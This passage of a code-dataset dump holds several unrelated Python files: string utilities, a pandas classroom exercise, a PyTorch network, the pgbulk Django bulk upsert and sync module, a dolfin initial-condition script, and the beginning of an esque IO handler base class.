s.replace('d', 'x') # ==> 'abc xxe'\r\n capitilised = s.capitilize() # ==> 'Abc Dde'\r\n\"\"\"\r\n\r\n\r\ndef startsWithIgnoreCase(string, substring):\r\n \"\"\"\r\n Checks if 'string' starts with 'substring' ignoring case\r\n\r\n Args:\r\n string (string):\r\n full string\r\n\r\n substring (string):\r\n sub string\r\n\r\n Returns:\r\n (bool):\r\n True if 'string' starts with 'substring' ignoring case\r\n \"\"\"\r\n return re.match(substring, string, re.I)\r\n\r\n\r\ndef clean(s):\r\n \"\"\"\r\n Removes space, tab, end of line etc from string\r\n \"\"\"\r\n return re.sub(\"[ \\t\\n\\v\\f\\r]\", \"\", s)\r\n\r\n\r\ndef reverse(s):\r\n \"\"\"\r\n Reverses string\r\n \"\"\"\r\n return s[::-1]\r\n\r\n\r\ndef ensureHexFormat(hexFormat=\"#06x\"):\r\n \"\"\"\r\n Sets format string for hex numbers according to specification of 'format()'\r\n Corrects format if leading '#' or tailing 'x' are missing.\r\n \"\"\"\r\n s = str(hexFormat)\r\n if s.startswith(\"#\") and len(s) > 1:\r\n s = s[1:]\r\n if s.endswith(\"x\") and len(s) > 1:\r\n s = s[:-1]\r\n try:\r\n i = int(s, 16)\r\n except ValueError:\r\n i = 2+4\r\n hexFormat = \"#06x\"\r\n print(\"??? setHexFormat(): invalid hex format:'#\" + s +\r\n \"x', corrected to:'\" + hexFormat + \"'\")\r\n if i < 2+1:\r\n hexFormat = \"#03x\"\r\n print(\"??? setHexFormat(): length of hex string:'\" + str(i) +\r\n \"', increased to:'\" + hexFormat + \"'\")\r\n elif i > 2+16:\r\n hexFormat = \"#018x\"\r\n print(\"??? setHexFormat(): length of hex string:'\" + str(i) +\r\n \"', reduced to:'\" + hexFormat + \"'\")\r\n if not hexFormat.startswith(\"#\"):\r\n hexFormat = '#' + hexFormat\r\n if not hexFormat[1] == \"0\":\r\n hexFormat = \"#0\" + hexFormat[1:]\r\n if not hexFormat.endswith('x'):\r\n hexFormat += \"x\"\r\n return hexFormat\r\n\r\n\r\ndef scientificToStandard_if_greater_1(s):\r\n \"\"\"\r\n Converts scientic notation of numbers greater one to standard format\r\n\r\n Note:\r\n for numbers less then one, the string '0' is returned\r\n \"\"\"\r\n try:\r\n int(s)\r\n except:\r\n try:\r\n x = float(s)\r\n if int(x * 10) % 10 == 0:\r\n s = str(int(x))\r\n else:\r\n s = str(x)\r\n except:\r\n pass\r\n return s\r\n\r\n\r\n# Examples ####################################################################\r\n\r\nif __name__ == '__main__':\r\n ALL = 1\r\n\r\n if 0 or ALL:\r\n def f():\r\n s = 'abc dde'\r\n length = len(s) # ==> 7\r\n repetitions = s.count('d') # ==> 2\r\n if 'dde' in s:\r\n index = s.index('dde') # ==> 4\r\n split = s.split('c') # ==> ['ab', ' dde']\r\n rev = s[::-1] # ==> 'edd cba'\r\n replaced = s.replace('d', 'x') # ==> 'abc xxe'\r\n capitilised = ' '.join([x.capitalize() for x in s.split()])\r\n # ==> 'Abc Dde'\r\n for key in sorted(locals()):\r\n print('{:>15}: {}'.format(key, locals()[key]))\r\n f()\r\n\r\n if 0 or ALL:\r\n f = ensureHexFormat(\"#06x \") # \"06\" is total string length\r\n x = 14\r\n s = format(x, f) # returns \"0x000e\"\r\n print('1 x:', x, ' f:', f, ' s:', s)\r\n\r\n f = ensureHexFormat(\"#11x\") # \"06\" is total string length\r\n x = -155\r\n s = format(x, f) # returns \"0x000e\"\r\n print('2 x:', x, ' f:', f, ' s:', s)\r\n print()\r\n\r\n if 0 or ALL:\r\n S = ['1e3', '-.1e2', '1.2.34e3', '1.2.34D3', '1e-20', '1e-3', '1e20']\r\n for s in S:\r\n print('3 s:', s, 'replaced:', scientificToStandard_if_greater_1(s))\r\n print()\r\n\r\n if 0 or ALL:\r\n s = 'abcdef'\r\n print('4 s:', s, ' reverse:', reverse(s))\r\n print()\r\n","sub_path":"coloredlids/tools/string_manip.py","file_name":"string_manip.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"82179374","text":"import pandas as pd\nimport random\n\nworld_pop = pd.read_csv('/Users/mdavis/dev/OMIS30/OMIS30_Winter2019/Class13/world_pop.csv')\nworld_pop_list = []\nfor row in world_pop.values:\n world_pop_list.append(list(row))\n# random.shuffle(world_pop_list)\n\n# print(world_pop_list)\n\n# All imports above here\n# Don't worry about these....\n\n# Loop through continents\n # Subset to that continent only\n # Find the max population in that continent\n # Find the country that matches that population\n\n# print(type(world_pop_list[1]))\n# print(world_pop_list[5])\n\ncontinent_list = set()\nfor country in world_pop_list:\n continent = country[1]\n continent_list.add(continent)\nprint(continent_list)\n# continent_set = set(continent_list)\n# print(continent_set[1])\n\n# Africa\n# Subset\n# print(continent)\n# print(country)\nafrica_countries = []\nfor africa_country in world_pop_list:\n continent = africa_country[1]\n if continent == 'Africa':\n africa_countries.append(africa_country)\n # elif continent == 'Europe':\n # africa_countries.append(africa_country)\n\nprint(africa_countries)\n\n# Loop through africa lists\nprint(len(africa_countries))\n# print(continent)","sub_path":"Class13/world_pop.py","file_name":"world_pop.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"524052072","text":"import torch\n\nclass Network(torch.nn.Module):\n def __init__(self):\n super(Network,self).__init__()\n\n def BasicConv(Input,Output):\n return torch.nn.Sequential(\n torch.nn.Conv2d(in_channels=Input,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False),\n torch.nn.Conv2d(in_channels=Output,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False),\n torch.nn.Conv2d(in_channels=Output,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False)\n )\n\n def Upsample(Input,Output):\n return torch.nn.Sequential(\n torch.nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True),\n torch.nn.Conv2d(in_channels=Input, out_channels=Output, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(inplace=False)\n )\n\n self.moduleConv1=BasicConv(24,64)\n self.moduleConv2=BasicConv(64,128)\n self.moduleConv3=BasicConv(128,256)\n self.moduleConv4=BasicConv(256,512)\n\n self.moduleDeconv4=BasicConv(512,512)\n self.moduleDeconv3=BasicConv(512,512)\n self.moduleDeconv2=BasicConv(256,256)\n self.moduleDeconv1 = BasicConv(128, 128)\n\n self.Upsample4=Upsample(512,512)\n self.Upsample3=Upsample(512,256)\n self.Upsample2=Upsample(256,128)\n self.Upsample1 = Upsample(128, 24)\n\n #@torchsnooper.snoop()\n def forward(self, input):\n tensorConv1=self.moduleConv1(input)\n tensorConv2=self.moduleConv2(torch.nn.functional.avg_pool2d(input=tensorConv1, kernel_size=2, stride=2, count_include_pad=False))\n tensorConv3=self.moduleConv3(torch.nn.functional.avg_pool2d(input=tensorConv2, kernel_size=2, stride=2, count_include_pad=False))\n #print(tensorConv3.shape)\n tensorConv4 = self.moduleConv4(torch.nn.functional.avg_pool2d(input=tensorConv3, kernel_size=2, stride=2, count_include_pad=False))\n #print(tensorConv4.shape)\n\n tensorDeconv4=self.Upsample4(self.moduleDeconv4(torch.nn.functional.avg_pool2d(input=tensorConv4, kernel_size=2, stride=2, count_include_pad=False)))\n #print(tensorDeconv4.shape)\n tensorDeconv3=self.Upsample3(self.moduleDeconv3(tensorConv4+tensorDeconv4))\n #print(tensorDeconv3.shape)\n a=self.moduleDeconv2(tensorConv3 + tensorDeconv3)\n tensorDeconv2=self.Upsample2(a)\n b=self.moduleDeconv1(tensorConv2 + tensorDeconv2)\n tensorDeconv1=self.Upsample1(b)\n\n return tensorDeconv1\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"639597622","text":"from collections import namedtuple, UserString\nimport itertools\n\nfrom django.db import connections\nfrom django.db import models\nfrom django.db.models.sql.compiler import SQLCompiler\nfrom django.utils import timezone\nfrom psycopg2.extensions import AsIs\n\n\nclass UpdateField(UserString):\n def __init__(self, field, expression=None):\n self.data = field\n self.expression = expression\n\n\nclass UpsertResult(list):\n \"\"\"\n Returned by the upsert operation.\n\n Wraps a list and provides properties to access created, updated,\n untouched, and deleted elements\n \"\"\"\n\n @property\n def created(self):\n return (i for i in self if i.status_ == \"c\")\n\n @property\n def updated(self):\n return (i for i in self if i.status_ == \"u\")\n\n @property\n def untouched(self):\n return (i for i in self if i.status_ == \"n\")\n\n @property\n def deleted(self):\n return (i for i in self if i.status_ == \"d\")\n\n\ndef _quote(field):\n return '\"{0}\"'.format(field)\n\n\ndef _get_update_fields(queryset, to_update, exclude=None):\n \"\"\"\n Get the fields to be updated in an upsert.\n\n Always exclude auto_now_add, auto_created fields, and unique fields in an\n update\n \"\"\"\n exclude = exclude or []\n model = queryset.model\n fields = {\n **{field.attname: field for field in model._meta.fields},\n **{field.name: field for field in model._meta.fields},\n }\n\n if to_update is None:\n to_update = [field.attname for field in model._meta.fields]\n\n to_update = [\n attname\n for attname in to_update\n if (\n attname not in exclude\n and not getattr(fields[attname], \"auto_now_add\", False)\n and not fields[attname].auto_created\n )\n ]\n\n return to_update\n\n\ndef _fill_auto_fields(queryset, values):\n \"\"\"\n Given a list of models, fill in auto_now and auto_now_add fields\n for upserts. Since django manager utils passes Django's ORM, these values\n have to be automatically constructed\n \"\"\"\n model = queryset.model\n auto_field_names = [\n f.attname\n for f in model._meta.fields\n if getattr(f, \"auto_now\", False) or getattr(f, \"auto_now_add\", False)\n ]\n now = timezone.now()\n for value in values:\n for f in auto_field_names:\n setattr(value, f, now)\n\n return values\n\n\ndef _prep_sql_args(queryset, connection, cursor, sql_args):\n compiler = SQLCompiler(query=queryset.query, connection=connection, using=queryset.using)\n\n return [\n AsIs(cursor.mogrify(*sql_arg.as_sql(compiler, connection)).decode(\"utf-8\"))\n if hasattr(sql_arg, \"as_sql\")\n else sql_arg\n for sql_arg in sql_args\n ]\n\n\ndef _get_field_db_val(queryset, field, value, connection):\n if hasattr(value, \"resolve_expression\"): # pragma: no cover\n # Handle cases when the field is of type \"Func\" and other expressions.\n # This is useful for libraries like django-rdkit that can't easily be tested\n return value.resolve_expression(queryset.query, allow_joins=False, for_save=True)\n else:\n return field.get_db_prep_save(value, connection)\n\n\ndef _sort_by_unique_fields(queryset, model_objs, unique_fields):\n \"\"\"\n Sort a list of models by their unique fields.\n\n Sorting models in an upsert greatly reduces the chances of deadlock\n when doing concurrent upserts\n \"\"\"\n model = queryset.model\n connection = connections[queryset.db]\n unique_fields = [field for field in model._meta.fields if field.attname in unique_fields]\n\n def sort_key(model_obj):\n return tuple(\n _get_field_db_val(queryset, field, getattr(model_obj, field.attname), connection)\n for field in unique_fields\n )\n\n return sorted(model_objs, key=sort_key)\n\n\ndef _get_values_for_row(queryset, model_obj, all_fields):\n connection = connections[queryset.db]\n return [\n # Convert field value to db value\n # Use attname here to support fields with custom db_column names\n _get_field_db_val(queryset, field, getattr(model_obj, field.attname), connection)\n for field in all_fields\n ]\n\n\ndef _get_values_for_rows(queryset, model_objs, all_fields):\n connection = connections[queryset.db]\n row_values = []\n sql_args = []\n\n for i, model_obj in enumerate(model_objs):\n sql_args.extend(_get_values_for_row(queryset, model_obj, all_fields))\n if i == 0:\n row_values.append(\n \"({0})\".format(\n \", \".join([\"%s::{0}\".format(f.db_type(connection)) for f in all_fields])\n )\n )\n else:\n row_values.append(\"({0})\".format(\", \".join([\"%s\"] * len(all_fields))))\n\n return row_values, sql_args\n\n\ndef _get_return_fields_sql(returning, return_status=False, alias=None):\n if alias:\n return_fields_sql = \", \".join(\n \"{0}.{1}\".format(alias, _quote(field)) for field in returning\n )\n else:\n return_fields_sql = \", \".join(_quote(field) for field in returning)\n\n if return_status:\n return_fields_sql += \", CASE WHEN xmax = 0 THEN 'c' ELSE 'u' END AS status_\"\n\n return return_fields_sql\n\n\ndef _get_upsert_sql(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Generates the postgres specific sql necessary to perform an upsert\n (ON CONFLICT) INSERT INTO table_name (field1, field2)\n VALUES (1, 'two')\n ON CONFLICT (unique_field) DO UPDATE SET field2 = EXCLUDED.field2;\n \"\"\"\n model = queryset.model\n update_expressions = {f: f.expression for f in update_fields if getattr(f, \"expression\", None)}\n\n # Use all fields except pk unless the uniqueness constraint is the pk field\n all_fields = [\n field\n for field in model._meta.fields\n if field.column in unique_fields or not isinstance(field, models.AutoField)\n ]\n\n all_field_names = [field.column for field in all_fields]\n returning = returning if returning is not True else [f.column for f in model._meta.fields]\n all_field_names_sql = \", \".join([_quote(field) for field in all_field_names])\n\n # Convert field names to db column names\n unique_fields = [model._meta.get_field(unique_field) for unique_field in unique_fields]\n update_fields = [model._meta.get_field(update_field) for update_field in update_fields]\n\n row_values, sql_args = _get_values_for_rows(queryset, model_objs, all_fields)\n\n unique_field_names_sql = \", \".join([_quote(field.column) for field in unique_fields])\n update_fields_expressions = {\n field.column: f\"EXCLUDED.{_quote(field.column)}\" for field in update_fields\n }\n if update_expressions:\n connection = connections[queryset.db]\n compiler = SQLCompiler(query=queryset.query, connection=connection, using=queryset.using)\n with connection.cursor() as cursor:\n for field_name, expr in update_expressions.items():\n expr = expr.resolve_expression(queryset.query, allow_joins=False, for_save=True)\n update_fields_expressions[\n model._meta.get_field(field_name).column\n ] = cursor.mogrify(*expr.as_sql(compiler, connection)).decode(\"utf-8\")\n\n update_fields_sql = \", \".join(\n f\"{_quote(field.column)} = {update_fields_expressions[field.column]}\"\n for field in update_fields\n )\n\n return_sql = (\n \"RETURNING \" + _get_return_fields_sql(returning, return_status=True) if returning else \"\"\n )\n ignore_duplicates_sql = \"\"\n if ignore_duplicate_updates:\n ignore_duplicates_sql = (\n \" WHERE ({update_fields_sql}) IS DISTINCT FROM ({excluded_update_fields_sql}) \"\n ).format(\n update_fields_sql=\", \".join(\n \"{0}.{1}\".format(model._meta.db_table, _quote(field.column))\n for field in update_fields\n ),\n excluded_update_fields_sql=\", \".join(update_fields_expressions.values()),\n )\n\n on_conflict = (\n \"DO UPDATE SET {0} {1}\".format(update_fields_sql, ignore_duplicates_sql)\n if update_fields\n else \"DO NOTHING\"\n )\n\n if return_untouched:\n row_values_sql = \", \".join(\n [\"('{0}', {1})\".format(i, row_value[1:-1]) for i, row_value in enumerate(row_values)]\n )\n sql = (\n ' WITH input_rows(\"temp_id_\", {all_field_names_sql}) AS ('\n \" VALUES {row_values_sql}\"\n \" ), ins AS ( \"\n \" INSERT INTO {table_name} ({all_field_names_sql})\"\n \" SELECT {all_field_names_sql} FROM input_rows ORDER BY temp_id_\"\n \" ON CONFLICT ({unique_field_names_sql}) {on_conflict} {return_sql}\"\n \" )\"\n \" SELECT DISTINCT ON ({table_pk_name}) * FROM (\"\n \" SELECT status_, {return_fields_sql}\"\n \" FROM ins\"\n \" UNION ALL\"\n \" SELECT 'n' AS status_, {aliased_return_fields_sql}\"\n \" FROM input_rows\"\n \" JOIN {table_name} c USING ({unique_field_names_sql})\"\n \" ) as results\"\n \" ORDER BY results.\\\"{table_pk_name}\\\", CASE WHEN(status_ = 'n') THEN 1 ELSE 0 END;\"\n ).format(\n all_field_names_sql=all_field_names_sql,\n row_values_sql=row_values_sql,\n table_name=model._meta.db_table,\n unique_field_names_sql=unique_field_names_sql,\n on_conflict=on_conflict,\n return_sql=return_sql,\n table_pk_name=model._meta.pk.name,\n return_fields_sql=_get_return_fields_sql(returning),\n aliased_return_fields_sql=_get_return_fields_sql(returning, alias=\"c\"),\n )\n else:\n row_values_sql = \", \".join(row_values)\n sql = (\n \" INSERT INTO {table_name} ({all_field_names_sql})\"\n \" VALUES {row_values_sql}\"\n \" ON CONFLICT ({unique_field_names_sql}) {on_conflict} {return_sql}\"\n ).format(\n table_name=model._meta.db_table,\n all_field_names_sql=all_field_names_sql,\n row_values_sql=row_values_sql,\n unique_field_names_sql=unique_field_names_sql,\n on_conflict=on_conflict,\n return_sql=return_sql,\n )\n\n return sql, sql_args\n\n\ndef _fetch(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n sync,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perfom the upsert and do an optional sync operation\n \"\"\"\n model = queryset.model\n connection = connections[queryset.db]\n if (return_untouched or sync) and returning is not True:\n returning = set(returning) if returning else set()\n returning.add(model._meta.pk.name)\n upserted = []\n deleted = []\n # We must return untouched rows when doing a sync operation\n return_untouched = True if sync else return_untouched\n\n if model_objs:\n sql, sql_args = _get_upsert_sql(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n )\n\n with connection.cursor() as cursor:\n sql_args = _prep_sql_args(queryset, connection, cursor, sql_args)\n cursor.execute(sql, sql_args)\n if cursor.description:\n nt_result = namedtuple(\"Result\", [col[0] for col in cursor.description])\n upserted = [nt_result(*row) for row in cursor.fetchall()]\n\n pk_field = model._meta.pk.name\n if sync:\n orig_ids = queryset.values_list(pk_field, flat=True)\n deleted = set(orig_ids) - {getattr(r, pk_field) for r in upserted}\n model.objects.filter(pk__in=deleted).delete()\n\n nt_deleted_result = namedtuple(\"DeletedResult\", [model._meta.pk.name, \"status_\"])\n return UpsertResult(\n upserted + [nt_deleted_result(**{pk_field: d, \"status_\": \"d\"}) for d in deleted]\n )\n\n\ndef _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n sync=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk upsert on a table, optionally syncing the results.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to sync\n model_objs (List[Model]): A list of Django models to sync. All models\n in this list will be bulk upserted and any models not in the table\n (or queryset) will be deleted if sync=True.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated. If you want to\n perform an expression such as an ``F`` object on a field when\n it is updated, use the ``pgbulk.UpdateField`` class. See\n examples below.\n returning (bool|List[str]): If True, returns all fields. If a list,\n only returns fields in the list\n sync (bool, default=False): Perform a sync operation on the queryset\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if all columns are identical to the row in the database.\n return_untouched (bool, default=False): When\n ``ignore_duplicate_updates`` is ``True``, untouched rows will not\n be returned in upsert results. Set this to ``True`` to return\n untouched rows.\n \"\"\"\n queryset = queryset if isinstance(queryset, models.QuerySet) else queryset.objects.all()\n\n # Populate automatically generated fields in the rows like date times\n _fill_auto_fields(queryset, model_objs)\n\n # Sort the rows to reduce the chances of deadlock during concurrent upserts\n model_objs = _sort_by_unique_fields(queryset, model_objs, unique_fields)\n update_fields = _get_update_fields(queryset, update_fields, exclude=unique_fields)\n\n return _fetch(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n sync,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n )\n\n\ndef update(queryset, model_objs, update_fields=None):\n \"\"\"\n Bulk updates a list of model objects that are already saved.\n\n Args:\n queryset (QuerySet): The queryset to use when bulk updating\n model_objs (List[Model]): Model object values to use for the update\n update_fields (List[str], default=None): A list of fields on the\n model objects to update. If ``None``, all fields will be updated.\n\n Example:\n Update an attribute of multiple models in bulk::\n\n import pgbulk\n\n pgbulk.update(\n MyModel,\n [\n MyModel(id=1, some_attr='some_val1'),\n MyModel(id=2, some_attr='some_val2')\n ],\n # These are the fields that will be updated. If not provided,\n # all fields will be updated\n ['some_attr']\n )\n \"\"\"\n queryset = queryset if isinstance(queryset, models.QuerySet) else queryset.objects.all()\n connection = connections[queryset.db]\n model = queryset.model\n update_fields = _get_update_fields(queryset, update_fields)\n\n # Add the pk to the value fields so we can join during the update\n value_fields = [model._meta.pk.attname] + update_fields\n\n row_values = [\n [\n _get_field_db_val(\n queryset,\n model_obj._meta.get_field(field),\n getattr(model_obj, model_obj._meta.get_field(field).attname),\n connection,\n )\n for field in value_fields\n ]\n for model_obj in model_objs\n ]\n\n # If we do not have any values or fields to update, just return\n if len(row_values) == 0 or len(update_fields) == 0:\n return []\n\n db_types = [model._meta.get_field(field).db_type(connection) for field in value_fields]\n\n value_fields_sql = \", \".join(\n '\"{field}\"'.format(field=model._meta.get_field(field).column) for field in value_fields\n )\n\n update_fields_sql = \", \".join(\n [\n '\"{field}\" = \"new_values\".\"{field}\"'.format(field=model._meta.get_field(field).column)\n for field in update_fields\n ]\n )\n\n values_sql = \", \".join(\n [\n \"({0})\".format(\n \", \".join(\n [\n \"%s::{0}\".format(db_types[i]) if not row_number and i else \"%s\"\n for i, _ in enumerate(row)\n ]\n )\n )\n for row_number, row in enumerate(row_values)\n ]\n )\n\n update_sql = (\n \"UPDATE {table} \"\n \"SET {update_fields_sql} \"\n \"FROM (VALUES {values_sql}) AS new_values ({value_fields_sql}) \"\n 'WHERE \"{table}\".\"{pk_field}\" = \"new_values\".\"{pk_field}\"'\n ).format(\n table=model._meta.db_table,\n pk_field=model._meta.pk.column,\n update_fields_sql=update_fields_sql,\n values_sql=values_sql,\n value_fields_sql=value_fields_sql,\n )\n\n update_sql_params = list(itertools.chain(*row_values))\n\n with connection.cursor() as cursor:\n update_sql_params = _prep_sql_args(queryset, connection, cursor, update_sql_params)\n return cursor.execute(update_sql, update_sql_params)\n\n\ndef upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk upsert on a table.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to upsert\n model_objs (List[Model]): A list of Django models to upsert. All models\n in this list will be bulk upserted.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated. If you want to\n perform an expression such as an ``F`` object on a field when\n it is updated, use the ``pgbulk.UpdateField`` class. See\n examples below.\n returning (bool|List[str], default=False): If True, returns all fields.\n If a list, only returns fields in the list. If False, do not\n return results from the upsert.\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if all columns are identical to the row in the database.\n return_untouched (bool, default=False): When\n ``ignore_duplicate_updates`` is ``True``, untouched rows will not\n be returned in upsert results. Set this to ``True`` to return\n untouched rows.\n\n Examples:\n A basic bulk upsert on a model::\n\n import pgbulk\n\n pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n # These are the fields that identify the uniqueness constraint.\n ['int_field'],\n # These are the fields that will be updated if the row already\n # exists. If not provided, all fields will be updated\n ['some_attr']\n )\n\n Return the results of an upsert::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n # ``True`` will return all columns. One can also explicitly\n # list which columns will be returned\n returning=True\n )\n\n # Print which results were created\n print(results.created)\n\n # Print which results were updated.\n # By default, if an update results in no changes, it will not\n # be updated and will not be returned.\n print(results.updated)\n\n Upsert values and update rows even when the update is meaningless\n (i.e. a duplicate update). This is turned off by default, but it\n can be enabled in case postgres triggers or other processes\n need to happen as a result of an update::\n\n pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n # Perform updates in the database even if it's a duplicate\n # update.\n ignore_duplicate_updates=False\n )\n\n Upsert values and ignore duplicate updates, but still return\n the rows that were untouched by the upsert::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n returning=True,\n # Even though we don't perform an update on a duplicate,\n # return the row that was part of the upsert but untouched\n # This option is only meaningful when\n # ignore_duplicate_updates=True (the default)\n return_untouched=True,\n )\n\n # Print untouched rows\n print(results.untouched)\n\n Use an expression for a field if an update happens. In the example\n below, we increment ``some_int_field`` by one whenever an update happens.\n Otherwise it defaults to zero::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(some_int_field=0, some_key='a'),\n MyModel(some_int_field=0, some_key='b')\n ],\n ['some_key'],\n [\n # Use the UpdateField class to specify an expression for the update.\n # If provided, the expression will be executed when an update happens.\n pgbulk.UpdateField('some_int_field', expression=models.F('some_int_field') + 1)\n ],\n )\n\n \"\"\"\n return _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=update_fields,\n returning=returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n sync=False,\n )\n\n\ndef sync(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk sync on a table. A sync is an upsert on a list of model\n objects followed by a delete on the queryset whose elements were not\n in the list of models.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to sync. If a model is provided, all rows are\n candidates for the sync operation\n model_objs (List[Model]): A list of Django models to sync. All models\n in this list will be bulk upserted. Any models in the queryset\n that are not present in this list will be deleted.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated.\n returning (bool|List[str]): If True, returns all fields. If a list,\n only returns fields in the list\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if the row is a duplicate.\n\n Examples:\n Sync two elements to a table with three elements. The sync will\n upsert two elements and delete the third::\n\n # Assume the MyModel table has objects with int_field=1,2,3\n # We will sync this table to two elements\n results = pgbulk.sync(\n MyModel.objects.all(),\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n )\n\n # Print created, updated, untouched, and deleted rows from the sync\n print(results.created)\n print(results.updated)\n print(results.untouched)\n print(results.deleted)\n \"\"\"\n return _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=update_fields,\n returning=returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n sync=True,\n )\n","sub_path":"pgbulk/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"581197370","text":"import random\nfrom dolfin import *\n\nclass InitialConditions(Expression):\n def __init__(self):\n random.seed(2 + MPI.process_number())\n def eval(self, values, x):\n values[0] = 0.63 + 0.02*(0.5 - random.random())\n\nmesh = RectangleMesh(0, 0, 2, 2, 150, 150, \"crossed\")\nV = FunctionSpace(mesh, \"Lagrange\", 1)\n\nic = interpolate(InitialConditions(), V)\nFile(\"random_ic.xml.gz\") << ic\n","sub_path":"cahn_hilliard/gen_ic.py","file_name":"gen_ic.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"316978631","text":"import dataclasses\nfrom abc import ABC, abstractmethod\nfrom typing import Any, ClassVar, Dict, Generic, Iterable, List, Tuple, Type, TypeVar, Union\n\nfrom esque.io.exceptions import EsqueIOHandlerConfigException\nfrom esque.io.messages import BinaryMessage\nfrom esque.io.stream_events import PermanentEndOfStream, StreamEvent\n\nH = TypeVar(\"H\", bound=\"BaseHandler\")\nHC = TypeVar(\"HC\", bound=\"HandlerConfig\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HandlerConfig:\n host: str\n path: str\n scheme: str\n\n def __post_init__(self):\n self._validate()\n\n def _validate(self):\n problems: List[str] = self._validate_fields()\n if problems:\n raise EsqueIOHandlerConfigException(\"Handler config validation failed: \\n\" + \"\\n\".join(problems))\n\n def _validate_fields(self) -> List[str]:\n problems = []\n if self.host is None:\n problems.append(\"host cannot be None\")\n if self.path is None:\n problems.append(\"path cannot be None\")\n if self.scheme is None:\n problems.append(\"scheme cannot be None\")\n return problems\n\n\nclass BaseHandler(ABC, Generic[HC]):\n\n config_cls: ClassVar[Type[HC]] = HandlerConfig\n config: HC\n\n def __init__(self, config: HC):\n \"\"\"\n Base class for all Esque IO handlers. A handler is responsible for writing and reading messages\n to and from a source. The handler is unaware of the underlying message's format and treats all\n sources as binary. It may support persisting the serializer config for easier data retrieval.\n\n :param config:\n \"\"\"\n self.config = config\n self._assert_correct_config_type()\n\n def _assert_correct_config_type(self):\n if not isinstance(self.config, self.config_cls):\n raise EsqueIOHandlerConfigException(\n f\"Invalid type for the handler config. \"\n f\"Expected: {self.config_cls.__name__}, \"\n f\"provided: {type(self.config).__name__}\"\n )\n\n @abstractmethod\n def seek(self, position: int):\n \"\"\"\n Seek the handler's reading position to the given offset for all partitions. The next message that is read will\n be at this offset if it is still available and after this offset if and only if it is not available anymore.\n\n :param position: The offset to seek to\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_serializer_configs(self) -> Tuple[Dict[str, Any], Dict[str, Any]]:\n \"\"\"\n Retrieves the serializer config from this handler's source, if possible.\n Implementations 